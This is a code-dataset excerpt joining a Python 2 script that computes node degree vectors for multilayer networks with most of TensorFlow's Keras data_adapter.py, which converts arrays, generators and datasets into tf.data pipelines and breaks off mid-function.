destRecord = DirectoryRecord(destService, fields)
destRecords.append(destRecord)
if destRecords:
yield destService.updateRecords(destRecords, create=True)
if __name__ == "__main__":
main()
| apache-2.0 | -4,358,202,407,898,562,000 | 27.801325 | 111 | 0.626811 | false |
KatolaZ/mammult | structure/activity/node_degree_vectors.py | 1 | 2498 | # This file is part of MAMMULT: Metrics And Models for Multilayer Networks
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
####
##
## Take as input the layers of a multiplex, and provide as output a
## file where the n-th line contains the degrees of the n-th node at
## each layer, separated by a space, in the format:
##
## node1_deglay1 node1_deglay2 .... node1_deglayM
## node2_deglay1 node2_deglay2 .... node2_deglayM
## ..............................................
## nodeN_deglay1 nodeN_deglay2 .... nodeN_deglayM
##
##
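##
## Illustrative example (not part of the original script; the file names are
## hypothetical): if layer1.txt contains the edges "0 1" and "1 2", and
## layer2.txt contains the edges "0 2" and "1 2", then
##
##    python node_degree_vectors.py layer1.txt layer2.txt
##
## prints one line per node (0, 1, 2) with its degree on each layer:
##
##    1 1
##    2 1
##    1 2
##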
import sys
if len(sys.argv) < 2:
print "Usage: %s <layer1> [<layer2>...]" % sys.argv[0]
sys.exit(1)
node_degrees = {}
max_N = -1
num_layer = 0
for layer in sys.argv[1:]:
with open(layer, "r") as lines:
for l in lines:
if l[0] == "#":
continue
s, d = [int(x) for x in l.strip(" \n").split(" ")[:2]]
if s > max_N:
max_N = s
if d > max_N:
max_N = d
if s in node_degrees:
if num_layer in node_degrees[s]:
node_degrees[s][num_layer] += 1
else:
node_degrees[s][num_layer] = 1
else:
node_degrees[s] = {}
node_degrees[s][num_layer] = 1
if d in node_degrees:
if num_layer in node_degrees[d]:
node_degrees[d][num_layer] += 1
else:
node_degrees[d][num_layer] = 1
else:
node_degrees[d] = {}
node_degrees[d][num_layer] = 1
num_layer += 1
for n in range(max_N+1):
for i in range(num_layer):
if n in node_degrees:
if i in node_degrees[n]:
print node_degrees[n][i],
else:
print 0,
else:
print 0,
print
| gpl-3.0 | 6,631,259,597,424,604,000 | 29.463415 | 74 | 0.542834 | false |
petewarden/tensorflow | tensorflow/python/keras/engine/data_adapter.py | 1 | 57975 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Adapter module that convert different input data objects into tf.dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import functools
import itertools
import math
import random
import numpy as np
import six
from tensorflow.python.data.experimental.ops import cardinality
from tensorflow.python.data.experimental.ops import distribute_options
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.distribute import distribution_strategy_context as ds_context
from tensorflow.python.distribute import input_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import smart_cond
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import backend
from tensorflow.python.keras.engine import training_utils
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import dataset_creator
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
keras_data_adapter_gauge = monitoring.BoolGauge(
"/tensorflow/api/keras/data_adapters", "keras data adapter usage", "method")
try:
from scipy import sparse as scipy_sparse # pylint: disable=g-import-not-at-top
except ImportError:
scipy_sparse = None
try:
import pandas as pd # pylint: disable=g-import-not-at-top
except ImportError:
pd = None
@six.add_metaclass(abc.ABCMeta)
class DataAdapter(object):
"""Base class for input data adapter.
  In TF 2.0, tf.data is the preferred API for users to feed in data. In order
  to simplify the training code path, all input data objects will be
  converted to `tf.data.Dataset` if possible.
  Note that since this class is mainly targeted at TF 2.0, it makes a number of
  assumptions under the hood, e.g. eager context by default, distribution
  strategy, etc. In the meantime, some legacy feature support might be dropped,
  e.g. the Iterator from the v1 dataset API.
The sample usage of this class is like:
```
x = tf.data.Dataset.range(100)
adapter_cls = [NumpyArrayDataAdapter, ..., DatasetAdapter]
applicable_adapters = [cls for cls in adapter_cls if cls.can_handle(x)]
if len(applicable_adapters) != 1:
raise ValueError("Expect only one adapter class to handle the input")
dataset = applicable_adapters[0](x).get_dataset()
for data in dataset:
# training
```
"""
@staticmethod
def can_handle(x, y=None):
"""Whether the current DataAdapter could handle the input x and y.
    Structure-wise, x and y can be a single object, a list of objects if there
    are multiple inputs/outputs, or a dictionary of objects when the
    inputs/outputs are named.
Args:
x: input features.
y: target labels. Note that y could be None in the case of prediction.
Returns:
boolean
"""
raise NotImplementedError
@abc.abstractmethod
def __init__(self, x, y=None, **kwargs):
"""Create a DataAdapter based on data inputs.
    The caller must make sure to call `can_handle()` first before invoking this
    method. Providing an unsupported data type will result in unexpected
    behavior.
Args:
x: input features.
y: target labels. Note that y could be None in the case of prediction.
**kwargs: Other keyword arguments for DataAdapter during the construction
        of the tf.data.Dataset. For example:
- Numpy data might have `sample_weights` which will be used for
weighting the loss function during training.
- Numpy data might need to have `batch_size` parameter when constructing
the dataset and iterator.
- Certain input might need to be distribution strategy aware. When
`distribution_strategy` is passed, the created dataset need to respect
the strategy.
      DataAdapter might choose to ignore any keyword argument if it doesn't
      use it, or raise an exception if any required argument is not provided.
"""
if not self.can_handle(x, y):
raise ValueError("{} Cannot handle input {}, {}".format(
self.__class__, x, y))
@abc.abstractmethod
def get_dataset(self):
"""Get a dataset instance for the current DataAdapter.
    Note that the dataset returned does not repeat for epochs, so the caller
    might need to create a new iterator for the same dataset at the beginning
    of each epoch. This behavior might change in the future.
Returns:
      A tf.data.Dataset. The caller might use the dataset in different
      contexts, e.g. iter(dataset) in eager mode to get the values directly, or
      in graph mode, providing the iterator tensor to the Keras model function.
"""
raise NotImplementedError
@abc.abstractmethod
def get_size(self):
"""Return the size (number of batches) for the dataset created.
    For certain types of input data, the number of batches is known, e.g. for
    Numpy data, the size is the same as (number_of_elements / batch_size).
    Whereas for a dataset or a python generator, the size is unknown since it
    may or may not have an end state.
Returns:
int, the number of batches for the dataset, or None if it is unknown. The
caller could use this to control the loop of training, show progress bar,
or handle unexpected StopIteration error.
"""
raise NotImplementedError
@abc.abstractmethod
def batch_size(self):
"""Return the batch size of the dataset created.
    For certain types of input data, the batch size is known, and even
    required, e.g. for a numpy array. Whereas for a dataset, the batch size is
    unknown unless we take a peek.
Returns:
int, the batch size of the dataset, or None if it is unknown.
"""
raise NotImplementedError
def representative_batch_size(self):
"""Return a representative size for batches in the dataset.
This is not guaranteed to be the batch size for all batches in the
dataset. It just needs to be a rough approximation for batch sizes in
the dataset.
Returns:
int, a representative size for batches found in the dataset,
or None if it is unknown.
"""
return self.batch_size()
@abc.abstractmethod
def has_partial_batch(self):
"""Whether the dataset has partial batch at the end."""
raise NotImplementedError
@abc.abstractmethod
def partial_batch_size(self):
"""The size of the final partial batch for dataset.
Will return None if has_partial_batch is False or batch_size is None.
"""
raise NotImplementedError
@abc.abstractmethod
def should_recreate_iterator(self):
"""Returns whether a new iterator should be created every epoch."""
raise NotImplementedError
def get_samples(self):
"""Returns number of samples in the data, or `None`."""
if not self.get_size() or not self.batch_size():
return None
total_sample = self.get_size() * self.batch_size()
if self.has_partial_batch():
total_sample -= (self.batch_size() - self.partial_batch_size())
return total_sample
def on_epoch_end(self):
"""A hook called after each epoch."""
pass
class TensorLikeDataAdapter(DataAdapter):
"""Adapter that handles Tensor-like objects, e.g. EagerTensor and NumPy."""
@staticmethod
def can_handle(x, y=None):
# TODO(kaftan): Check performance implications of using a flatten
# here for other types of inputs.
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
tensor_types = (ops.Tensor, np.ndarray)
if pd:
tensor_types = (ops.Tensor, np.ndarray, pd.Series, pd.DataFrame)
def _is_tensor(v):
if isinstance(v, tensor_types):
return True
return False
return all(_is_tensor(v) for v in flat_inputs)
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
epochs=1,
steps=None,
shuffle=False,
**kwargs):
super(TensorLikeDataAdapter, self).__init__(x, y, **kwargs)
x, y, sample_weights = _process_tensorlike((x, y, sample_weights))
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
# If sample_weights are not specified for an output use 1.0 as weights.
(sample_weights, _, _) = training_utils.handle_partial_sample_weights(
y, sample_weights, sample_weight_modes, check_all_flat=True)
inputs = pack_x_y_sample_weight(x, y, sample_weights)
num_samples = set(int(i.shape[0]) for i in nest.flatten(inputs)).pop()
_check_data_cardinality(inputs)
# If batch_size is not passed but steps is, calculate from the input data.
# Default to 32 for backwards compat.
if not batch_size:
batch_size = int(math.ceil(num_samples / steps)) if steps else 32
self._size = int(math.ceil(num_samples / batch_size))
self._batch_size = batch_size
num_full_batches = int(num_samples // batch_size)
self._partial_batch_size = num_samples % batch_size
if isinstance(shuffle, str):
shuffle = shuffle.lower()
self._shuffle = shuffle
# Vectorized version of shuffle.
# This is a performance improvement over using `from_tensor_slices`.
# The indices of the data are shuffled and batched, and these indices
# are then zipped with the data and used to extract a batch of the data
# at each step. The performance improvements here come from:
# 1. vectorized batch using gather
# 2. parallelized map
# 3. pipelined permutation generation
# 4. optimized permutation batching
# 5. disabled static optimizations
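    # Rough standalone sketch of the idea (illustrative values, not executed
    # here): for num_samples=5 and batch_size=2 an epoch might look like
    #
    #   indices = tf.random.shuffle(tf.range(5))    # e.g. [3, 0, 4, 1, 2]
    #   batches = [indices[0:2], indices[2:4], indices[4:5]]
    #   first_x = tf.gather(x, batches[0], axis=0)  # vectorized batch "slice"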
indices_dataset = dataset_ops.DatasetV2.range(1)
if shuffle != "batch":
indices_dataset = indices_dataset.repeat(epochs)
def permutation(_):
# It turns out to be more performant to make a new set of indices rather
# than reusing the same range Tensor. (presumably because of buffer
# forwarding.)
indices = math_ops.range(num_samples, dtype=dtypes.int64)
if shuffle and shuffle != "batch":
indices = random_ops.random_shuffle(indices)
return indices
# We prefetch a single element. Computing large permutations can take quite
# a while so we don't want to wait for prefetching over an epoch boundary to
# trigger the next permutation. On the other hand, too many simultaneous
# shuffles can contend on a hardware level and degrade all performance.
indices_dataset = indices_dataset.map(permutation).prefetch(1)
def slice_batch_indices(indices):
"""Convert a Tensor of indices into a dataset of batched indices.
This step can be accomplished in several ways. The most natural is to
slice the Tensor in a Dataset map. (With a condition on the upper index to
handle the partial batch.) However it turns out that coercing the Tensor
into a shape which is divisible by the batch size (and handling the last
partial batch separately) allows for a much more favorable memory access
pattern and improved performance.
Args:
indices: Tensor which determines the data order for an entire epoch.
Returns:
A Dataset of batched indices.
"""
num_in_full_batch = num_full_batches * batch_size
first_k_indices = array_ops.slice(indices, [0], [num_in_full_batch])
first_k_indices = array_ops.reshape(
first_k_indices, [num_full_batches, batch_size])
flat_dataset = dataset_ops.DatasetV2.from_tensor_slices(first_k_indices)
if self._partial_batch_size:
index_remainder = dataset_ops.DatasetV2.from_tensors(array_ops.slice(
indices, [num_in_full_batch], [self._partial_batch_size]))
flat_dataset = flat_dataset.concatenate(index_remainder)
if shuffle == "batch":
# 1024 is a magic constant that has not been properly evaluated
flat_dataset = flat_dataset.shuffle(1024).repeat(epochs)
return flat_dataset
indices_dataset = indices_dataset.flat_map(slice_batch_indices)
dataset = self.slice_inputs(indices_dataset, inputs)
if shuffle == "batch":
def shuffle_batch(*batch):
return nest.map_structure(random_ops.random_shuffle, batch)
dataset = dataset.map(shuffle_batch)
self._dataset = dataset
def slice_inputs(self, indices_dataset, inputs):
"""Slice inputs into a Dataset of batches.
Given a Dataset of batch indices and the unsliced inputs,
this step slices the inputs in a parallelized fashion
and produces a dataset of input batches.
Args:
indices_dataset: A Dataset of batched indices
inputs: A python data structure that contains the inputs, targets,
and possibly sample weights.
Returns:
A Dataset of input batches matching the batch indices.
"""
dataset = dataset_ops.DatasetV2.zip((
indices_dataset,
dataset_ops.DatasetV2.from_tensors(inputs).repeat()
))
def grab_batch(i, data):
return nest.map_structure(lambda d: array_ops.gather(d, i, axis=0), data)
dataset = dataset.map(
grab_batch, num_parallel_calls=dataset_ops.AUTOTUNE)
# Default optimizations are disabled to avoid the overhead of (unnecessary)
# input pipeline graph serialization and deserialization
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
if self._shuffle:
# See b/141490660 for more details.
options.experimental_external_state_policy = (
distribute_options.ExternalStatePolicy.IGNORE)
dataset = dataset.with_options(options)
return dataset
def get_dataset(self):
return self._dataset
def get_size(self):
return self._size
def batch_size(self):
return self._batch_size
def has_partial_batch(self):
return self._partial_batch_size > 0
def partial_batch_size(self):
return self._partial_batch_size or None
def should_recreate_iterator(self):
# An infinite dataset is always created here.
return False
class GenericArrayLikeDataAdapter(TensorLikeDataAdapter):
"""Adapter that handles array-like data without forcing it into memory.
This adapter handles array-like datasets that may be too big to fully
fit into memory.
Specifically, this adapter handles any Python class which implements:
  `__getitem__`, `__len__`, `shape`, and `dtype` with the same meanings
as Numpy, but it ignores any case where all the inputs are Tensors or Numpy
arrays (because that case is handled by the base TensorLikeDataAdapter).
It ignores scipy sparse matrices and Composite Tensors because those are
handled by the CompositeTensorDataAdapter.
It also does not handle lists/tuples of scalars, because those are handled
by the ListsOfScalarsDataAdapter.
"""
@staticmethod
def can_handle(x, y=None):
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
def _is_array_like(v):
"""Return True if v is a Tensor, array, or is array-like."""
return (
hasattr(v, "__getitem__") and
hasattr(v, "shape") and
hasattr(v, "dtype") and
hasattr(v, "__len__")
)
if (not TensorLikeDataAdapter.can_handle(x, y) and
not CompositeTensorDataAdapter.can_handle(x, y)):
return all(_is_array_like(v) for v in flat_inputs)
else:
return False
def __init__(self, *args, **kwargs):
logging.warn(
"Keras is training/fitting/evaluating on array-like data. Keras may "
"not be optimized for this format, so if your input data format is "
"supported by TensorFlow I/O (https://github.com/tensorflow/io) we "
"recommend using that to load a Dataset instead.")
super(GenericArrayLikeDataAdapter, self).__init__(*args, **kwargs)
def slice_inputs(self, indices_dataset, inputs):
"""Slice inputs into a Dataset of batches.
Given a Dataset of batch indices and the unsliced inputs,
this step slices the inputs in a parallelized fashion
and produces a dataset of input batches.
Args:
indices_dataset: A Dataset of batched indices
inputs: A python data structure that contains the inputs, targets,
and possibly sample weights.
Returns:
A Dataset of input batches matching the batch indices.
"""
flat_inputs = nest.flatten(inputs)
def dynamic_shape_like(t):
shape = list(t.shape)
shape[0] = None
return tuple(shape)
flat_dtypes = [inp.dtype for inp in flat_inputs]
contiguous = True
if self._shuffle and self._shuffle != "batch":
contiguous = False
def grab_batch(indices):
"""Grab a batch of data from the inputs."""
# This uses a py_function to avoid converting the array-like
# into a Tensor before slicing it, because converting the array-like
      # to a Tensor may force it into memory.
def py_method(ind):
def slice_array(data):
return training_utils.slice_arrays(data, ind.numpy(),
contiguous=contiguous)
return [slice_array(inp) for inp in flat_inputs]
flat_out = script_ops.eager_py_func(py_method, [indices], flat_dtypes)
for v, original_inp in zip(flat_out, flat_inputs):
v.set_shape(dynamic_shape_like(original_inp))
return nest.pack_sequence_as(inputs, flat_out)
dataset = indices_dataset.map(
grab_batch, num_parallel_calls=dataset_ops.AUTOTUNE)
return dataset
class DatasetCreatorAdapter(DataAdapter):
"""Adapter that handles dataset functions."""
def __init__(self, x, *args, **kwargs):
super(DatasetCreatorAdapter, self).__init__(x, *args, **kwargs)
if not isinstance(x, dataset_creator.DatasetCreator):
raise TypeError("The input of a `DatasetCreatorAdapter` should be a "
"`DatasetCreator` but it received type {}.".format(
type(x)))
self.dataset_creator = x
self.strategy = kwargs.get("distribution_strategy", None)
@staticmethod
def can_handle(x, y=None):
if isinstance(x, dataset_creator.DatasetCreator):
assert y is None
return True
def should_recreate_iterator(self):
# We expect users to shuffle the dataset in their `dataset_fn` supplied to
# `DatasetCreator`. Since that is a buffered shuffle, we intend to not reset
# the dataset so the batches that are not shuffled can still be pulled.
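    # A rough sketch of such a user-supplied `dataset_fn` (names and values
    # here are illustrative, not part of this class):
    #
    #   def dataset_fn(input_context):
    #     ds = tf.data.Dataset.from_tensor_slices((features, labels))
    #     return ds.shuffle(1000).batch(32).repeat()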
return False
def get_size(self):
return None # To be inferred by `DataHandler`.
def get_dataset(self):
return self.strategy.distribute_datasets_from_function(self.dataset_creator)
def batch_size(self):
raise NotImplementedError()
def has_partial_batch(self):
raise NotImplementedError()
def partial_batch_size(self):
raise NotImplementedError()
class CompositeTensorDataAdapter(DataAdapter):
"""Adapter that handles composite tensor."""
@staticmethod
def can_handle(x, y=None):
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
def _is_composite(v):
# Dataset/iterator/DistributedDataset inherits from CompositeTensor but
# should be handled by DatasetAdapter and GeneratorAdapter.
if (tf_utils.is_extension_type(v) and
not isinstance(v,
(dataset_ops.DatasetV2, iterator_ops.IteratorBase)) and
not _is_distributed_dataset(v)):
return True
# Support Scipy sparse tensors if scipy is installed
if scipy_sparse is not None and scipy_sparse.issparse(v):
return True
return False
def _is_tensor_or_composite(v):
if isinstance(v, (ops.Tensor, np.ndarray)):
return True
return _is_composite(v)
return (any(_is_composite(v) for v in flat_inputs) and
all(_is_tensor_or_composite(v) for v in flat_inputs))
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
steps=None,
shuffle=False,
**kwargs):
super(CompositeTensorDataAdapter, self).__init__(x, y, **kwargs)
x, y, sample_weights = _process_tensorlike((x, y, sample_weights))
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
# If sample_weights are not specified for an output use 1.0 as weights.
(sample_weights, _, _) = training_utils.handle_partial_sample_weights(
y, sample_weights, sample_weight_modes, check_all_flat=True)
inputs = pack_x_y_sample_weight(x, y, sample_weights)
dataset = dataset_ops.DatasetV2.from_tensor_slices(inputs)
num_samples = int(nest.flatten(x)[0].shape[0])
if shuffle:
dataset = dataset.shuffle(num_samples)
# If batch_size is not passed but steps is, calculate from the input data.
# Default to 32 for backwards compat.
if not batch_size:
batch_size = int(math.ceil(num_samples / steps)) if steps else 32
dataset = dataset.batch(batch_size)
self._size = int(math.ceil(num_samples / batch_size))
self._batch_size = batch_size
self._has_partial_batch = (self._size != (num_samples // batch_size))
self._partial_batch_size = None
if self._has_partial_batch:
self._partial_batch_size = (
num_samples - (self._size - 1) * self._batch_size)
self._dataset = dataset
def get_dataset(self):
return self._dataset
def get_size(self):
return self._size
def batch_size(self):
return self._batch_size
def has_partial_batch(self):
return self._has_partial_batch
def partial_batch_size(self):
return self._partial_batch_size
def should_recreate_iterator(self):
return True
class ListsOfScalarsDataAdapter(DataAdapter):
"""Adapter that handles lists of scalars and lists of lists of scalars."""
@staticmethod
def can_handle(x, y=None):
handles_x = ListsOfScalarsDataAdapter._is_list_of_scalars(x)
handles_y = True
if y is not None:
handles_y = ListsOfScalarsDataAdapter._is_list_of_scalars(y)
return handles_x and handles_y
@staticmethod
def _is_list_of_scalars(inp):
if isinstance(inp, (float, int, str, bytes, bytearray)):
return True
if isinstance(inp, (list, tuple)) and inp:
return ListsOfScalarsDataAdapter._is_list_of_scalars(inp[0])
return False
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
shuffle=False,
**kwargs):
super(ListsOfScalarsDataAdapter, self).__init__(x, y, **kwargs)
x = np.asarray(x)
if y is not None:
y = np.asarray(y)
if sample_weights is not None:
sample_weights = np.asarray(sample_weights)
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
self._internal_adapter = TensorLikeDataAdapter(
x,
y=y,
sample_weights=sample_weights,
sample_weight_modes=sample_weight_modes,
batch_size=batch_size,
shuffle=shuffle,
**kwargs)
def get_dataset(self):
return self._internal_adapter.get_dataset()
def get_size(self):
return self._internal_adapter.get_size()
def batch_size(self):
return self._internal_adapter.batch_size()
def has_partial_batch(self):
return self._internal_adapter.has_partial_batch()
def partial_batch_size(self):
return self._internal_adapter.partial_batch_size()
def should_recreate_iterator(self):
return True
class DatasetAdapter(DataAdapter):
"""Adapter that handles `tf.data.Dataset`."""
@staticmethod
def can_handle(x, y=None):
return (isinstance(x, (dataset_ops.DatasetV1, dataset_ops.DatasetV2)) or
_is_distributed_dataset(x))
def __init__(self,
x,
y=None,
sample_weights=None,
steps=None,
**kwargs):
super(DatasetAdapter, self).__init__(x, y, **kwargs)
    # Note that the dataset instance is immutable, so it's fine to reuse the
    # user-provided dataset.
self._dataset = x
# The user-provided steps.
self._user_steps = steps
self._validate_args(y, sample_weights, steps)
def get_dataset(self):
return self._dataset
def get_size(self):
return # Inferred in `DataHandler`.
def batch_size(self):
return None
def has_partial_batch(self):
return False
def partial_batch_size(self):
return None
def should_recreate_iterator(self):
# Since DistributedDatasets have no cardinality, the user must provide
# all steps that need to be run, calling `.repeat()` as needed.
if _is_distributed_dataset(self._dataset):
return False
# If user doesn't supply `steps`, or if they supply `steps` that
# exactly equals the size of the `Dataset`, create a new iterator
# each epoch.
return (self._user_steps is None or
cardinality.cardinality(self._dataset).numpy() == self._user_steps)
def _validate_args(self, y, sample_weights, steps):
"""Validates `__init__` arguments."""
# Arguments that shouldn't be passed.
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"dataset as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"dataset as input.")
if steps is None:
if _is_distributed_dataset(self._dataset):
raise ValueError("When providing a distributed dataset, you must "
"specify the number of steps to run.")
size = cardinality.cardinality(self._dataset).numpy()
if size == cardinality.INFINITE and steps is None:
raise ValueError(
"When providing an infinite dataset, you must specify "
"the number of steps to run (if you did not intend to "
"create an infinite dataset, make sure to not call "
"`repeat()` on the dataset).")
class GeneratorDataAdapter(DataAdapter):
"""Adapter that handles python generators and iterators."""
@staticmethod
def can_handle(x, y=None):
return ((hasattr(x, "__next__") or hasattr(x, "next"))
and hasattr(x, "__iter__")
and not isinstance(x, data_utils.Sequence))
def __init__(self,
x,
y=None,
sample_weights=None,
workers=1,
use_multiprocessing=False,
max_queue_size=10,
model=None,
**kwargs):
# Generators should never shuffle as exhausting the generator in order to
# shuffle the batches is inefficient.
kwargs.pop("shuffle", None)
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"python generator as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"python generator as input.")
super(GeneratorDataAdapter, self).__init__(x, y, **kwargs)
# Since we have to know the dtype of the python generator when we build the
# dataset, we have to look at a batch to infer the structure.
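    # (The peeked batch is chained back onto the generator in
    # `_peek_and_restore`, so no data is lost.)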
peek, x = self._peek_and_restore(x)
peek = self._standardize_batch(peek)
peek = _process_tensorlike(peek)
# Need to build the Model on concrete input shapes.
if model is not None and not model.built:
concrete_x, _, _ = unpack_x_y_sample_weight(peek)
model.distribute_strategy.run(
lambda x: model(x, training=False), args=(concrete_x,))
self._first_batch_size = int(nest.flatten(peek)[0].shape[0])
def _get_dynamic_shape(t):
shape = t.shape
# Unknown number of dimensions, `as_list` cannot be called.
if shape.rank is None:
return shape
return tensor_shape.TensorShape([None for _ in shape.as_list()])
output_shapes = nest.map_structure(_get_dynamic_shape, peek)
output_types = nest.map_structure(lambda t: t.dtype, peek)
# Note that dataset API takes a callable that creates a generator object,
# rather than generator itself, which is why we define a function here.
generator_fn = self._handle_multiprocessing(x, workers, use_multiprocessing,
max_queue_size)
def wrapped_generator():
for data in generator_fn():
yield self._standardize_batch(data)
dataset = dataset_ops.DatasetV2.from_generator(
wrapped_generator, output_types, output_shapes=output_shapes)
if workers == 1 and not use_multiprocessing:
dataset = dataset.prefetch(1)
self._dataset = dataset
def _standardize_batch(self, data):
"""Standardizes a batch output by a generator."""
# Removes `None`s.
x, y, sample_weight = unpack_x_y_sample_weight(data)
data = pack_x_y_sample_weight(x, y, sample_weight)
data = nest.list_to_tuple(data)
def _convert_dtype(t):
if (isinstance(t, np.ndarray) and issubclass(t.dtype.type, np.floating)):
return np.array(t, dtype=backend.floatx())
return t
data = nest.map_structure(_convert_dtype, data)
return data
@staticmethod
def _peek_and_restore(x):
peek = next(x)
return peek, itertools.chain([peek], x)
def _handle_multiprocessing(self, x, workers, use_multiprocessing,
max_queue_size):
"""Create a callable, possibly including an Enqueuer."""
if workers > 1 or (workers > 0 and use_multiprocessing):
def generator_fn():
enqueuer = data_utils.GeneratorEnqueuer(
x, use_multiprocessing=use_multiprocessing)
enqueuer.start(workers=workers, max_queue_size=max_queue_size)
return enqueuer.get()
else:
generator_fn = lambda: x
return generator_fn
def get_dataset(self):
return self._dataset
def get_size(self):
return None
def batch_size(self):
return None
def representative_batch_size(self):
return self._first_batch_size
def has_partial_batch(self):
return False
def partial_batch_size(self):
return
def should_recreate_iterator(self):
return False
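# A minimal usage sketch (hedged; the `_sketch_*` helper below is an assumption,
# not part of the original API, and nothing here runs at import time): wrapping a
# plain Python generator with GeneratorDataAdapter yields a tf.data pipeline of
# unknown size.
def _sketch_generator_adapter():
  def batch_gen():
    while True:
      yield np.zeros((8, 4), dtype="float32"), np.zeros((8, 1), dtype="float32")
  adapter = GeneratorDataAdapter(batch_gen())
  # The generator is infinite, so the adapter cannot report a size.
  return adapter.get_dataset(), adapter.get_size()  # (dataset, None)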
class KerasSequenceAdapter(GeneratorDataAdapter):
"""Adapter that handles `keras.utils.Sequence`."""
@staticmethod
def can_handle(x, y=None):
return isinstance(x, data_utils.Sequence)
def __init__(self,
x,
y=None,
sample_weights=None,
shuffle=False,
workers=1,
use_multiprocessing=False,
max_queue_size=10,
model=None,
**kwargs):
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"`keras.utils.Sequence` as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"`keras.utils.Sequence` as input.")
self._size = len(x)
self._shuffle_sequence = shuffle
self._keras_sequence = x
self._enqueuer = None
super(KerasSequenceAdapter, self).__init__(
x,
        shuffle=False,  # Shuffle is handled in the _make_callable override.
workers=workers,
use_multiprocessing=use_multiprocessing,
max_queue_size=max_queue_size,
model=model,
**kwargs)
@staticmethod
def _peek_and_restore(x):
return x[0], x
def _handle_multiprocessing(self, x, workers, use_multiprocessing,
max_queue_size):
if workers > 1 or (workers > 0 and use_multiprocessing):
def generator_fn():
self._enqueuer = data_utils.OrderedEnqueuer(
x, use_multiprocessing=use_multiprocessing,
shuffle=self._shuffle_sequence)
self._enqueuer.start(workers=workers, max_queue_size=max_queue_size)
return self._enqueuer.get()
else:
def generator_fn():
order = range(len(x))
if self._shuffle_sequence:
# Match the shuffle convention in OrderedEnqueuer.
order = list(order)
random.shuffle(order)
for i in order:
yield x[i]
return generator_fn
def get_size(self):
return self._size
def should_recreate_iterator(self):
return True
def on_epoch_end(self):
if self._enqueuer:
self._enqueuer.stop()
self._keras_sequence.on_epoch_end()
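# A hedged sketch (the `_ToySequence` class and `_sketch_*` helper are assumptions,
# not part of the original module): the smallest `keras.utils.Sequence` this
# adapter accepts only needs `__len__` and `__getitem__`.
def _sketch_keras_sequence_adapter():
  class _ToySequence(data_utils.Sequence):
    def __init__(self, x, y, batch_size=8):
      self.x, self.y, self.batch_size = x, y, batch_size
    def __len__(self):
      return int(np.ceil(len(self.x) / self.batch_size))
    def __getitem__(self, idx):
      s = slice(idx * self.batch_size, (idx + 1) * self.batch_size)
      return self.x[s], self.y[s]
  seq = _ToySequence(np.zeros((32, 4), "float32"), np.zeros((32, 1), "float32"))
  adapter = KerasSequenceAdapter(seq)
  return adapter.get_dataset(), adapter.get_size()  # size is len(seq) == 4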
ALL_ADAPTER_CLS = [
ListsOfScalarsDataAdapter, TensorLikeDataAdapter,
GenericArrayLikeDataAdapter, DatasetAdapter, GeneratorDataAdapter,
KerasSequenceAdapter, CompositeTensorDataAdapter, DatasetCreatorAdapter
]
def select_data_adapter(x, y):
"""Selects a data adapter than can handle a given x and y."""
adapter_cls = [cls for cls in ALL_ADAPTER_CLS if cls.can_handle(x, y)]
if not adapter_cls:
# TODO(scottzhu): This should be a less implementation-specific error.
raise ValueError(
"Failed to find data adapter that can handle "
"input: {}, {}".format(
_type_name(x), _type_name(y)))
elif len(adapter_cls) > 1:
raise RuntimeError(
"Data adapters should be mutually exclusive for "
"handling inputs. Found multiple adapters {} to handle "
"input: {}, {}".format(
adapter_cls, _type_name(x), _type_name(y)))
# Instrument the data adapter usage before returning it
keras_data_adapter_gauge.get_cell(adapter_cls[0].__name__).set(True)
return adapter_cls[0]
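# A minimal usage sketch (hedged, wrapped in a helper so nothing runs at import
# time): plain NumPy inputs are expected to resolve to TensorLikeDataAdapter,
# defined earlier in this file.
def _sketch_select_data_adapter():
  x = np.zeros((16, 4), dtype="float32")
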